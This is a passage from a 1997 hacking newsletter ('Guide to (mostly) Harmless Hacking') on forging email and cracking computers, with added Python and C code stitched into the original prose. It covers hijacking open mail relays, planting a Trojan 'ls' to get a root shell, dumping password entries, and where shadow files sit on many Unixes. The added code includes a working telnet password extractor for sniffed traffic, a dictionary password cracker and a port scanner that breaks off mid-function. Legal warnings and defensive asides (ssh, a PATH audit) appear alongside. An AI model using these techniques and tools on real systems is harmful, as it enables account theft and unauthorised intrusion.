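    # Each relay prepends its own Received: line, so the last one listed is the first hop.
    hops = [parse_received(v) for v in reversed(msg.get_all("Received", []))]
    findings = []
    for earlier, later in zip(hops, hops[1:]):
        skew = (earlier["when"] - later["when"]).total_seconds()
        if skew > 0:
            findings.append("%s stamped %.0f s before the relay that fed it, %s"
                            % (later["by"], skew, earlier["by"]))
    stamp, domain = decode_message_id(msg.get("Message-Id", ""))
    first_relay = hops[0]["by"] if hops else ""
    if domain and first_relay and not same_site(domain, first_relay):
        findings.append("Message-Id lives at %s, but the first relay was %s"
                        % (domain, first_relay))
    x_sender = msg.get("X-Sender", "")
    if "unverified" in x_sender.lower():
        findings.append("mail client marked X-Sender as unverified: " + x_sender)
    origin = (hops[0]["helo"] or hops[0]["from"]) if hops else None
    transit = (hops[-1]["when"] - hops[0]["when"]).total_seconds() if hops else 0
    return {"hops": hops, "origin": origin, "transit_seconds": transit,
            "message_id_time": stamp, "message_id_domain": domain,
            "findings": findings}


if __name__ == "__main__":
    for name, text in (("Norway", NORWAY_HEADER), ("Digest", DIGEST_HEADER)):
        r = analyze(text)
        print(name, "origin:", r["origin"], "transit: %.0f s" % r["transit_seconds"])
        for f in r["findings"]:
            print("  !", f)
```

Run as a script it prints the origin, end-to-end transit time and findings for each sample; the Norwegian header comes out clean, the digest header gets both flags.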

So how was I able to use Icefubarnet Internet’s mail server to send out the Happy Hacker Digest? Fortunately Eudora’s naivete makes it easy for me to use any mail server that has an open SMTP or ESMTP port. You may be surprised to discover that there are uncountable Internet mail servers that you may easily commandeer to send out your email -- if you have the right program -- or if you know how to telnet to port 25 (which runs using the SMTP or ESMTP protocols) and give the commands to send email yourself.

Why did I use Icefubarnet? Because at the time it was hosting an ftp site that was being used to download email bomber programs (http://www.icefubarnet.com/~astorm/uy4beta1.zip). Last time I checked the owner of the account from which he was offering this ugly stuff was unhappy because Icefubarnet Internet had made him take it down.

But -- back to how to commandeer mail servers while sending your message Ids elsewhere. In Eudora, just specify your victim mail server under the hosts section of the options menu (under tools). Then specify the computer to which you want to send your message ID under “POP Server.”

But if you try any of this monkey business with Pegasus, it gives a nasty error message accusing you of trying to forge email.

Of course you can always commandeer mail servers by writing your own program to commandeer mail servers. But that will be covered in the upcoming GTMHH on shell programming.

*********************************************
Newbie note: Shell programming? What the heck izzat? It means writing a program that uses a sequence of commands available to you in your Unix shell. If you want to be a real hacker, you *must* learn Unix! If you are serious about continuing to study these GTMHHs, you *must* either get a shell account or install some form of Unix on your home computer. You may find places where you can sign up for shell accounts through http://www.celestin.com/pocia/. Or email haxorshell@techbroker.com for information on how to sign up with a shell account that is friendly to hackers and that you may securely telnet into from your local ISP PPP dialup.
*********************************************

Hang on, Vol. 3 Number 5 will get into the really hairy stuff: how to do advanced deciphering of forged headers. Yes, how to catch that 31137 d00d who emailbombed you or spammed you!

Happy Hacking, and be good!
_________________________________________________________

Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com.  To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
________________________________________________________

___________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 No. 5

The Dread GTMHH on Cracking
____________________________________________________________

Nowadays if you ask just about anyone what a hacker is, he or she will tell you “a person who breaks into computers.”

That is partly on account of news stories which make it seem like the only thing a hacker does is commit computer crime. But there also is some truth to the public view. An obsession with breaking into computers has swept the hacker world. In fact, lots of hackers make fun of the kinds of stuff I think is fun: forging email and Usenet posts and programming Easter eggs into commercial software and creating Win 95 bootup screens that say “Bill Gates’ mother wears army boots.”

But since everyone and his brother has been emailing me pleading for instructions on how to break into computers, here it is. The dread GTMHH on Cracking. Yes, you, too, can become a genuine computer cracker and make everyone quake in his or her boots or slippers or whatever footgear they are wearing lately.

“But, but,” you say. “This list is for *legal* hacking. Sez right here in the welcome message you sent me when I signed up.”

Welcome to reality, Bub. Hackers fib sometimes.

************************************************
You can go to jail warning: Almost everywhere on the planet, breaking into a computer is illegal. The only exceptions are breaking into your own computer, or breaking into a computer whose owner has given you permission to try to break in. It doesn’t matter if you are just quietly sneaking around doing no harm. It doesn’t matter if you make some stranger’s computer better. You’re still in trouble if you break in without permission.
************************************************

Honestly, this Guide really *is* about harmless hacking. You don’t have to commit a crime to crack into a computer. From time to time hardy souls offer up their computers for their friends, or sometimes even the entire world, as targets for cracking. If you have permission from the owner of a computer, it is most definitely legal to break into it.

In fact, here’s a really fun computer that you have permission to break into. Damien Sorder invites you to break into his Internet host computer obscure.sekurity.org.

But how do you know whether this or any other announcement of a cracker welcome mat is legitimate? How do you know I’m not just playing a mean old trick on Damien by sending out an invitation to break into his box to the 5,000 crazed readers of the Happy Hacker list?

Here’s a good way to check the validity of offers to let anyone try to break into a computer. Get the domain name of the target computer, in this case obscure.sekurity.org. Then add “root@” to the domain name, for example root@obscure.sekurity.org. Email the owner of that computer. Ask him if I was fibbing about his offer. If he says I made it up, tell him he’s just chicken, that if he was a real hacker he’d be happy to have thousands of clueless newbies running Satan against his box. Just kidding:)

Actually, in this case you may email info@sekurity.org for more details on Damien’s offer to let one and all try to crack his box. Also, please be good guys and attack off hours (Mountain Daylight Savings Time, US) so he can use obscure.sekurity.org for other stuff during the day.

Also, Damien requests “If you (or anyone) want to try to hack obscure, please mail root@sekurity.org and mention that you are doing it, and what domain you are coming from. That way I can distinguish between legit and real attacks.”

We all owe you thanks, Damien, for providing a legal target for the readers of this GTMHH to test their cracking skills.

So let’s assume that you have chosen a legitimate target computer to try to break into. What? Some guys say it’s too hard to break into a fortified box like obscure.sekurity.org? They say it’s more fun to break into a computer when they’re breaking the law? They say to be a Real Hacker you must run around trashing the boxes of the cringing masses of Internet hosts? Haw, haw, sendmail 4.0! What lusers, they say. They sure taught those sendmail 4.0 dudes a lesson, right?

I say that those crackers who go searching for vulnerable computers and breaking into them are like Lounge Lizard Larry going into a bar and picking up the drunkest, ugliest gal (or guy) in the place. Yeah, we all are sure impressed.

If you want to be a truly elite cracker, however, you will limit your forays to computers whose owners consent to your explorations. This can -- should!-- include your own computer.

So with this in mind -- that you want more from life than to be the Lounge Lizard Larry of the hacker world -- here are some basics of breaking into computers.

There are an amazing number of ways to break into computers.

The simplest is to social engineer your way in. This generally involves lying. Here’s an example.

*********************************************
From: Oracle Service Humour List <oracle-list-return-@synapse.net>
Subject: HUM: AOL Hacker Turnaround (***)

Read Newfpyr's  masterful turning of the tables on a hacker...
Certainly one of the best Absurd IMs we've EVER received! Newfpyr's comments are in brackets throughout.
 
Zabu451: Hello from America Online! I'm sorry to inform you that there has been an error in the I/O section of your account database, and this server's password information has been temporarily destroyed. We need you, the AOL user, to hit reply and type in your password. Thank you for your help.

Newfpyr: Hello! This is Server Manager #563. I'm sorry to hear that your server has lost the password info. I mean, this has been happening too much lately. We have developed some solutions to this problem. Have you got the mail sent out to all server managers?

Zabu451: no

NewfPyr: Really? Ouch. There's been some problems with the server mailer lately. Oh, well. Here's a solution to this problem: try connecting your backup database to your main I/O port, then accessing the system restart.

Zabu451: no i still need passwords
 
NewfPyr: I see. Do you want me to send you the list of all the passwords of all the screen names of your server?

Zabu451: ya i want that
 
NewfPyr: Let me get the server manager to send it...

NewfPyr: He says I need your server manager password. Could you please type it in?

Zabu451: i dont have one

NewfPyr: What do you mean? That's the first thing every manager gets!

 Zabu451: it got deleted
 
NewfPyr: Wow! You must be having a lot of trouble. Let me find out what server you're using...

[Note: I checked his profile. It said he was from Springfield, Mass.]

NewfPyr: Okay, your number has been tracked to an area in Springfield, Mass.

Zabu451: how did u know?!!!?!?!!?!?!?!?!??!!
 
NewfPyr:  I used Server Tracker 5.0 . Don't you have it?
 
Zabu451: do you know my address!?!?!?!!?!?
 
NewfPyr: Of course not.
 
Zabu451: good
 
NewfPyr: I only know the number you're calling AOL from, which is from your server, right?

Zabu451: yes

NewfPyr: Good. Okay, now that we have your number, we have your address, and we are sending a repair team over there.

Zabu451: nonononono dont stop them now

NewfPyr: Why? Isn't your server down?

Zabu451: nonono its working now

NewfPyr: They’re still coming, just in case.

Zabu451: STOP THEM NOW

NewfPyr:  I can't break AOL Policy.

Zabu451: POEPLE ARE COMING TO MY HOUSE?!?!?!?!??

NewfPyr: No! To your server. You know, where you're calling AOL from.

Zabu451: im calling from my house

NewfPyr: But you said you where calling from the server!

Zabu451:  i lied im not reely a server guy

NewfPyr:  But you said you were!

Zabu451:  i lied i trying to get passwords please make them stop

NewfPyr:  Okay. The repair team isn't coming anymore.
 
Zabu451:  good
 
NewfPyr:  But a team of FBI agents is.

Zabu451: NONONONO
Zabu451: im sorry
Zabu451: ill never do it again please make them not come
Zabu451: PLEASE IL STOP ASKING FOR PASSWORDS FOREVER PLEASE MAKE THEM STOP!!

NewfPyr: I’m sorry, I can't do that. They should be at your house in 5 minutes.

Zabu451: IM SORRY IL DO ANYTHING PLEASE I DONT WANT THEM TO HURT ME
Zabu451: PLEASE
Zabu451: PLEEEEEEEEEEEEEEAAAAAAAAASSSSSSSSE

NewfPyr: They won't hurt you! You'll probably only spend a year of prison.

Zabu451: no IM ONLY A KID

NewfPyr: You are? That makes it different. You won’t go to prison for a year.

Zabu451:  i thout so

NewfPyr: You’ll go for two years.

Zabu451:  No! IM SORRY
Zabu451:  PLEASE MAKE THEM STOP
Zabu451:  PLEASE

[I thought this was enough. He was probably wetting his pants.]

NewfPyr: Since this was a first time offense, I think I can drop charges.

Zabu451: yea
Zabu451: thankyouthankyouthankyou

NewfPyr: The FBI agents have been withdrawn. If you ever do it again, we'll bump you off.

Zabu451:  i wont im sorry goodbye

[He promptly signed off.]

One of the RARE RARE occasions that we've actually felt sorry for the hacker. SEVENTY FIVE TOKENS to you, NewfPyr! We're STILL laughing - thanks a lot!

    Submitted by: Fran C. M. T. @ aol.com

(Want more of this humor in a jugular vein? Check out http://www.netforward.com/poboxes/?ablang)
*****************************************

Maybe you are too embarrassed to act like a typical AOL social engineering hacker. OK, then maybe you are ready to try the Trojan Horse. This is a type of attack wherein a program that appears to do something legitimate has been altered to attack a computer.

For example, on a Unix shell account you might put a Trojan in your home directory named “ls.” Then you tell tech support that there is something funny going on in your home directory. If the tech support guy is sufficiently clueless, he may go into your account while he has root permission. He then gives the command “ls” to see what’s there. According to Damien Sorder, “This will only work depending on his 'PATH' statement for his shell. If he searches '.' before '/bin', then it will work. Else, it won't.”

Presuming the sysadmin has been this careless, and if your Trojan is well written, it will call the real ls program to display your file info -- while also spawning a root shell for your very own use!

***************************************************
Newbie note: if you can get into a root shell you can do anything -- ANYTHING -- to your victim computer. Alas, this means it is surprisingly easy to screw up a Unix system while operating as root. A good systems administrator will give him or herself root privileges only when absolutely necessary to perform a task. Trojans are only one of the many reasons for this caution. Before you invite your friends to hack your box, be prepared for anything, and I mean ANYTHING, to get messed up even by the most well-meaning of friends.
***************************************************
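Damien’s PATH caveat can be checked mechanically. The following is an added example of my own, not code from the guide: it reads a PATH string the way a shell does, left to right, reports every entry that means “look in the current directory” and whether it comes before or after the system directories, and resolves a command name against a stand-in for the filesystem so you can see which copy of “ls” would win. The function names and the SYSTEM_DIRS list are my assumptions.

```python
"""Audit a PATH string for the search-order weakness the planted "ls" relies on."""
import os

# Where the real ls, cat and friends live; a planted copy only wins if a
# shell looks somewhere else first.
SYSTEM_DIRS = ("/bin", "/usr/bin", "/sbin", "/usr/sbin")


def cwd_entries(path_value):
    """Yield (position, description) for each PATH entry that makes the shell
    look in the current directory: a literal '.', an empty entry (a leading,
    trailing or doubled ':'), or any relative path."""
    for i, entry in enumerate(path_value.split(":")):
        if entry == ".":
            yield i, "'.'"
        elif entry == "":
            yield i, "empty entry"
        elif not entry.startswith("/"):
            yield i, "relative entry %r" % entry


def audit_path(path_value):
    """Return a list of findings for a PATH string such as os.environ['PATH'].

    A shell tries the entries left to right, so a current-directory entry that
    comes before the system directories lets a file named ls in whatever
    directory root happens to cd into shadow /bin/ls. One that comes after them
    only shadows commands the system directories lack, which still bites on a
    typo or a command that is not installed.
    """
    entries = path_value.split(":")
    system_positions = [i for i, e in enumerate(entries) if e in SYSTEM_DIRS]
    first_system = min(system_positions) if system_positions else len(entries)
    findings = ["%s at position %d is searched %s the system directories"
                % (what, i, "before" if i < first_system else "after")
                for i, what in cwd_entries(path_value)]
    if not system_positions:
        findings.append("no system directory (%s) in PATH" % ", ".join(SYSTEM_DIRS))
    return findings


def resolve(path_value, present_in):
    """Return the PATH entry a shell would take a command from, given the set
    of entries (spelled as in PATH) that actually contain a file of that
    name. The set stands in for the filesystem so the example runs anywhere."""
    for entry in path_value.split(":"):
        if entry in present_in:
            return entry
    return None


if __name__ == "__main__":
    for line in audit_path(os.environ.get("PATH", "")) or ["PATH looks clean"]:
        print(line)
    # Constructed case: a planted ls in the current directory beside the real one.
    print("ls comes from", resolve(".:/bin", {".", "/bin"}))
```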

Another attack is to install a sniffer program on an Internet host and grab passwords. What this means is any time you want to log into a computer from another computer by using telnet, your password is at the mercy of any sniffer program that may be installed on any computer through which your password travels.

However, to set up a sniffer you must be root on the Unix box on which it is installed. So this attack is clearly not for the beginner.

To get an idea of how many computers “see” your password when you telnet into your remote account, give the command (on a Unix system) of “traceroute my.computer” (it’s “tracert” in Windows 95) where you substitute the name of the computer you were planning to log in on for the “my.computer.”

Sometimes you may discover that when you telnet from one computer to another even within the city you live in, you may go through a dozen or more computers! For example, when I trace a route from an Albuquerque AOL session to my favorite Linux box in Albuquerque, I get:

C:\WINDOWS>tracert fubar.com

Tracing route to fubar.com [208.128.xx.61]
over a maximum of 30 hops:

  1   322 ms   328 ms   329 ms  ipt-q1.proxy.aol.com [152.163.205.95]
  2   467 ms   329 ms   329 ms  tot-ta-r5.proxy.aol.com [152.163.205.126]
  3   467 ms   323 ms   328 ms  f4-1.t60-4.Reston.t3.ans.net [207.25.134.69]
  4   467 ms   329 ms   493 ms  h10-1.t56-1.Washington-DC.t3.ans.net [140.223.57.25]
  5   469 ms   382 ms   329 ms  140.222.56.70
  6   426 ms   548 ms   437 ms  core3.Memphis.mci.net [204.70.125.1]
  7   399 ms   448 ms   461 ms  core2-hssi-2.Houston.mci.net [204.70.1.169]
  8   400 ms   466 ms   512 ms  border7-fddi-0.Houston.mci.net [204.70.191.51]
  9   495 ms   493 ms   492 ms  american-comm-svc.Houston.mci.net [204.70.194.86]
 10   522 ms   989 ms   490 ms  webdownlink.foobar.net [208.128.37.98]
 11   468 ms   493 ms   491 ms  208.128.xx.33
 12   551 ms   491 ms   492 ms  fubar.com [208.128.xx.61]

If someone were to put a sniffer on any computer on that route, they could get my password! Now do you still want to go telnetting around from one of your accounts to another?

A solution to this problem is to use Secure Shell. This is a program you can download for free from http://escert.upc.es/others/ssh/. According to the promotional literature, “Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels.” Everything in the session, the password included, is encrypted, so a sniffer on the route sees only ciphertext. Both ends must support it, though: the ssh client on your side and the sshd daemon on the computer you log into.
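Here is what a sniffer on any of those hops actually sees, as an added example that is not part of the Guide: a Python script that takes captured telnet segments, strips the telnet option negotiation, and pulls out the login name and password. The session it works on is constructed and embedded (the host name fubar.com is borrowed from the trace above; the account and password are invented), so it sends nothing and needs no network. A real sniffer would feed it the TCP payloads captured in promiscuous mode.

```python
# Added example, not code from the Guide.  Reconstructs a telnet login from captured
# client/server TCP payloads.  The session below is constructed: the host name comes
# from the traceroute above, the account and password are invented.

IAC, SB, SE = 0xFF, 0xFA, 0xF0          # telnet "interpret as command" framing bytes
NEGOTIATE = {0xFB, 0xFC, 0xFD, 0xFE}    # WILL, WONT, DO, DONT (each followed by an option byte)


def strip_telnet(data: bytes) -> bytes:
    """Drop telnet option negotiation so only what the user typed or saw is left."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:   # IAC IAC = a literal 0xFF
            out.append(IAC)
            i += 2
        elif i + 1 < len(data) and data[i + 1] in NEGOTIATE:
            i += 3
        elif i + 1 < len(data) and data[i + 1] == SB:    # subnegotiation runs to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:                                            # any other 2-byte command
            i += 2
    return bytes(out)


def extract_credentials(segments):
    """segments: [(direction, payload)] in wire order, direction "client" or "server".
    Watches server prompts to learn what the client is typing next, honours backspace
    (telnet sends keystrokes one per segment, typos included), and ends each field at CR."""
    creds = {"user": None, "password": None}
    field, buf = None, bytearray()
    for direction, payload in segments:
        text = strip_telnet(payload)
        if direction == "server":
            prompt = text.lower().rstrip()
            if prompt.endswith(b"login:"):
                field, buf = "user", bytearray()
            elif prompt.endswith(b"password:"):
                field, buf = "password", bytearray()
            continue
        if field is None:
            continue
        for b in text:
            if b in (0x08, 0x7F):                        # backspace / DEL
                if buf:
                    buf.pop()
            elif b in (0x0D, 0x0A):                      # end of line: field complete
                creds[field] = buf.decode("ascii", "replace")
                field = None
                break
            else:
                buf.append(b)
    return creds


def keystrokes(text: str, echo: bool):
    """Constructed traffic: one segment per keystroke, echoed by the server unless it is a password."""
    segs = []
    for ch in text.encode():
        segs.append(("client", bytes([ch])))
        if echo:
            segs.append(("server", bytes([ch])))
    return segs


SESSION = (
    [("server", b"\xff\xfd\x18\xff\xfb\x01"),      # DO TERMINAL-TYPE, WILL ECHO
     ("client", b"\xff\xfb\x18\xff\xfd\x01"),      # WILL TERMINAL-TYPE, DO ECHO
     ("server", b"\r\nfubar.com login: ")]
    + keystrokes("cmeinel", echo=True) + [("client", b"\r\x00")]
    + [("server", b"\r\nPassword: ")]
    + keystrokes("S3cretZ\x7f!", echo=False) + [("client", b"\r\x00")]   # typo, DEL, fix
    + [("server", b"\r\n$ ")]
)

if __name__ == "__main__":
    print(extract_credentials(SESSION))   # {'user': 'cmeinel', 'password': 'S3cret!'}
```

Note what the script does not need: no exploit, no root on the victim, nothing sent. The only requirement is a copy of the bytes, which is exactly what a sniffer on any router in the trace above has.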

If you want to get a password on a computer that you know is being accessed remotely by people using Windows 3.X, and if it is using Trumpet Winsock, and if you can get physical access to that Windows box, there is a super easy way to uncover the password. You can find the details, which are so easy they will blow your socks off, in the Bugtraq archives. Look for an entry titled “Password problem in Trumpet Winsock.” These archives are at http://www.netspace.org/lsv-archive/bugtraq.html

Another way to break into a computer is to get the entire password file. Of course the passwords in it are not stored in the clear: each is stored as a one-way hash produced by crypt(3). You cannot decrypt a hash, but you can guess candidate passwords, hash each guess with the same salt and compare. If your target computer doesn’t run a program to prevent people from picking easy passwords, many of them fall to this in minutes.

But how do you get password files? A good systems administrator keeps the hashes in a shadow file that only root can read, so even ordinary users on the machine that holds them can’t easily obtain the file.

The simplest way to get a password file is to steal a backup tape from your victim. This is one reason that most computer breakins are committed by insiders.

But often it is easy to get the entire password file of a LAN remotely from across the Internet. Why should this be so? Historically /etc/passwd had to be world-readable because many everyday programs (ls, finger, mail) read it to turn user IDs into names, and the password hashes sat in that same file for anyone to copy.

What the login program does is perform its hashing operation on the password you enter and then compare the result with the hashed entry in the password file. Login runs as root, so it does not need the hashes to be readable by everyone; that is exactly why moving them to a root-only shadow file works. Your job as the would-be cracker is to figure out where this system keeps its hashes and then get your target computer to deliver that file to you.

A tutorial on how to do this, which was published in the ezine K.R.A.C.K (produced by od^pheak <butler@tir.com>), follows. Comments in brackets have been added to the K.R.A.C.K. text.

*********************************************
Strategy For Getting Root With a shadowed Passwd

step#1
 

anonymous ftp into the server get passwd

[This step will almost never work, but even the simplest attack may be worth a try.]

step #2

 To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file.

Example:

#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* getpwent() walks the system password database entry by entry,
       NIS maps included.  On a shadowed system pw_passwd comes back as
       "x" or "*" unless the caller is root. */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (int) p->pw_uid, (int) p->pw_gid,
               p->pw_gecos, p->pw_dir, p->pw_shell);
    endpwent();
    return 0;
}

Or u can Look for the Unshadowed Backup.....

[The following list of likely places to find the unshadowed backup is available from the “Hack FAQ” written by Voyager. It may be obtained from http://www-personal.engin.umich.edu/~jgotts/hack-faq]

Unix                        Path                                       Token
---------------------------------------------------------------------------
AIX 3                       /etc/security/passwd                       !
       or                   /tcb/auth/files/<first letter of           #
                              username>/<username>
A/UX 3.0s                   /tcb/files/auth/?/                         *
BSD4.3-Reno                 /etc/master.passwd                         *
ConvexOS 10                 /etc/shadpw                                *
ConvexOS 11                 /etc/shadow                                *
DG/UX                       /etc/tcb/aa/user/                          *
EP/IX                       /etc/shadow                                x
HP-UX                       /.secure/etc/passwd                        *
IRIX 5                      /etc/shadow                                x
Linux 1.1                   /etc/shadow                                *
OSF/1                       /etc/passwd[.dir|.pag]                     *
SCO Unix #.2.x              /tcb/auth/files/<first letter of           *
                              username>/<username>
SunOS4.1+c2                 /etc/security/passwd.adjunct               ##username
SunOS 5.0                   /etc/shadow
                              <optional NIS+ private secure
                              maps/tables/whatever>
System V Release 4.0        /etc/shadow                                x
System V Release 4.2        /etc/security/* database
Ultrix 4                    /etc/auth[.dir|.pag]                       *
UNICOS                      /etc/udb
 
 

Step #3

crack it

[See below for instructions on how to crack a password file.]

**************************************************

So let’s say you have managed to get an encrypted password file. How do you extract the passwords?

An example of one of the many programs that can crack poorly chosen passwords is Unix Password Cracker by Scooter Corp. It is available at
ftp://ftp.info.bishkek.su/UNIX/crack-2a/crack-2a.tgz
or http://iukr.bishkek.su/crack/index.html

A good tutorial on some of the issues of cracking Windows NT passwords may be found at
http://ntbugtraq.rc.on.ca/samfaq.htm

One password cracker for Windows NT is L0phtcrack v1.5. It is available for FREE from http://www.L0pht.com (that's a ZERO after the 'L', not an 'o'). It comes with source so you can build it on just about any platform. Authors are mudge@l0pht.com and weld@l0pht.com.

Alec Muffett’s Crack 5.0 is the classic Unix password cracker, and an add-on lets it attack Windows NT hashes as well:
http://www.sun.rhbnc.ac.uk/~phac107/c50a-nt-0.10.tgz

Cracking gives you each password next to its login name, because every line of the password file carries both. What you may still lack, if you have not got the file yet, is a list of which accounts exist on the target, so that you have something to guess against. One way to get that is to finger your target computer; see the GTMHH Vol.1 No.1 for some ways to finger as many users as possible on a system. The verify (VRFY) command in sendmail is another way to confirm user names. A good systems administrator will turn off both the finger daemon and the sendmail verify command to make it harder for outsiders to break into their computers.

If finger and the verify command are disabled, there is yet another way to get user names. Oftentimes the part of a person’s email address that comes before the “@” is also a login name.
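The whole procedure from the question “how do you extract the passwords?” to the point about login names, as an added example that is not from the Guide or from Crack, L0phtcrack or the Scooter Corp program: a Python script that reads a passwd-style file, tells shadowed and passwordless accounts from crackable ones using the tokens in the table above, and then runs Crack-style guessing (dictionary words plus the user’s own login name and GECOS name parts, each with mangling rules) against each hash with its stored salt. The accounts, hashes and word list are constructed; demo_crypt is a stand-in that follows crypt(3)’s calling convention so that crypt.crypt (Python 3.12 and earlier) or passlib can be dropped in for real 13-character DES or $1$/$5$/$6$ hashes.

```python
import hashlib

# Added example, not code from the Guide or from Crack/L0phtcrack.  Does what those tools
# do: read a passwd-style file, skip the accounts whose hashes live in a shadow file, and
# for the rest hash candidate passwords with the stored salt until one matches.  The
# accounts, hashes and word list below are constructed for the demonstration.

# Password-field values that mean "look in the shadow file" (tokens from the table above).
SHADOW_TOKENS = {"x", "*", "!", "#", "="}


def demo_crypt(password: str, setting: str) -> str:
    """Stand-in for crypt(3) with the same calling convention: `setting` is either a bare
    salt or a previously returned hash, from which the salt is taken.  Replace with
    crypt.crypt or passlib to attack real Unix hashes; the search loop does not change."""
    salt = setting.split("$")[2] if setting.startswith("$demo$") else setting
    digest = hashlib.sha256((salt + password).encode()).digest()
    for _ in range(1000):                       # iteration makes each guess cost something
        digest = hashlib.sha256(digest + password.encode()).digest()
    return f"$demo${salt}${digest.hex()}"


def parse_passwd(text: str):
    """Split name:hash:uid:gid:gecos:home:shell lines into dicts, skipping junk lines."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) != 7:
            continue
        name, pw_hash, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "hash": pw_hash, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def password_state(entry) -> str:
    """'empty' (no password at all), 'shadowed' (hash kept elsewhere) or 'hash' (crackable)."""
    h = entry["hash"]
    if h == "":
        return "empty"
    if h in SHADOW_TOKENS or h.startswith("##"):
        return "shadowed"
    return "hash"


def mangle(word: str):
    """Crack-style rules: case variants and a reversal, each bare and with common suffixes."""
    for base in dict.fromkeys((word, word.lower(), word.capitalize(), word.upper(), word[::-1])):
        yield base
        for suffix in ("1", "123", "!", "97"):
            yield base + suffix


def candidates(entry, wordlist):
    """Dictionary words plus words taken from the account itself (login name, GECOS name
    parts).  Crack's big win was exactly this: people use their own names."""
    seeds = list(wordlist) + [entry["name"]] + entry["gecos"].replace(",", " ").split()
    seen = set()
    for seed in seeds:
        for guess in mangle(seed):
            if guess not in seen:
                seen.add(guess)
                yield guess


def crack(entries, wordlist, crypt_fn=demo_crypt) -> dict:
    """Return {login: password} for every crackable account that a candidate matches."""
    found = {}
    for entry in entries:
        if password_state(entry) != "hash":
            continue
        for guess in candidates(entry, wordlist):
            if crypt_fn(guess, entry["hash"]) == entry["hash"]:
                found[entry["name"]] = guess
                break
    return found


# Constructed sample file: two weak passwords, one strong one, one shadowed, one empty.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/sh",
    "cmeinel:" + demo_crypt("Hacker97", "Q9") + ":1001:100:Carolyn Meinel,,,:/home/cmeinel:/bin/tcsh",
    "bob:" + demo_crypt("bob123", "aB") + ":1002:100:Bob Jones:/home/bob:/bin/sh",
    "alice:" + demo_crypt("xK#9!vL2q", "zz") + ":1003:100:Alice:/home/alice:/bin/sh",
    "guest::1004:100:guest account:/home/guest:/bin/sh",
])
WORDLIST = ["password", "hacker", "secret", "welcome"]

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    for e in entries:
        print(f"{e['name']:8} {password_state(e)}")
    print(crack(entries, WORDLIST))   # {'cmeinel': 'Hacker97', 'bob': 'bob123'}
```

Two things to notice: the salt is read from the stored hash, so a guess is hashed once per account rather than once per file, and alice survives not because the program is weak but because her password is not derivable from anything in her entry or the list. That is the whole argument for a password-choice checker on the system you administer.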

If password cracking doesn’t work, there are many -- way too many -- other ways to break into a computer. Following are some suggestions on how to learn these techniques.

1. Learn as much as you can about the computer you have targeted. Find out what operating system it runs; whether it is on a local area network; and what programs it is running. Of special importance are the ports that are open and the daemons running on them.

For example, if you can get physical access to the computer, you can always get control of it one way or another. See the GTMHHs on Windows for many examples. What this means, of course, is that if you have something on your computer you absolutely, positively don’t want anyone to read, you had better encrypt it with a strong program such as PGP (which uses RSA to protect the per-file key and a symmetric cipher for the data itself). Then you should hope no one discovers a fast way to factor numbers, the mathematical Achilles heel of RSA and therefore of PGP’s RSA keys.

If you can’t get physical access, your next best bet is if you are on the same LAN. In fact, the vast majority of computer breakins are done by people who are employees of the company that is running that LAN on which the victim computer is attached. The most common mistake of computer security professionals is to set up a firewall against the outside world while leaving their LAN wide open to insider attack.

Important note: if you have even one Windows 95 box on your LAN, you can’t even begin to pretend you have a secure network. Windows 95 has no per-user file permissions at all: anyone at the keyboard can boot it into DOS mode (or just open a DOS window) and read, write and delete any file on its disks, including the cached network passwords it keeps there.

If the computer you have targeted is on the Internet, your next step would be to determine how it is connected to the Internet. The most important issue here is what TCP/IP ports are open and what daemons run on these ports.

***************************************************
Newbie note: a TCP/IP port is a number (0 to 65535) carried in every TCP or UDP packet that tells the receiving host which program should get the data. The programs that wait on ports are called “daemons”: they run all the time an Internet host computer is turned on and connected to the Net, waiting for incoming data to spur them into action.

An example of a TCP/IP port is number 25, assigned to SMTP (Simple Mail Transfer Protocol). An example of a daemon that can do interesting things when it gets data on port 25 is sendmail. See the GTMHH on forging email for examples of fun ways to play *legally* with port 25 on other people’s computers.

For a list of commonly used TCP/IP ports, see RFC 1700. One place you can look this up is http://ds2.internic.net/rfc/rfc1700.txt (the port registry has since passed to IANA, which maintains the current list online).
****************************************************
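The port-and-daemon idea from the newbie note, and the telnet-by-hand scan described further on, as an added example that is not from the Guide or from SATAN/ISS: a Python script that connects to each port, reads whatever greeting the daemon volunteers, and names the service from that greeting rather than from the port number alone. Because it has to run offline, it also carries a constructed stand-in for a 1997 sendmail on 127.0.0.1 that answers the VRFY command mentioned above; the banner, the host name fubar.com, the user list and the HELO name are all made up.

```python
import socket
import threading

# Added example, not code from the Guide.  Scans TCP ports the way the Guide describes doing it
# by hand with telnet, then names the daemon from its own greeting.  The fake sendmail at the
# bottom, its banner, host name and user list are constructed for the demonstration.

RFC1700_NAMES = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 79: "finger", 80: "http",
                 110: "pop3", 111: "sunrpc", 143: "imap", 513: "login"}

def classify(banner: str) -> str:
    """Name the daemon from its greeting, which is what you read off the screen by hand."""
    b = banner.lower()
    if b.startswith("ssh-"):
        return "ssh"
    if b.startswith("220"):
        return "smtp" if ("smtp" in b or "sendmail" in b) else "ftp" if "ftp" in b else "unknown-220"
    if b.startswith("+ok"):
        return "pop3"
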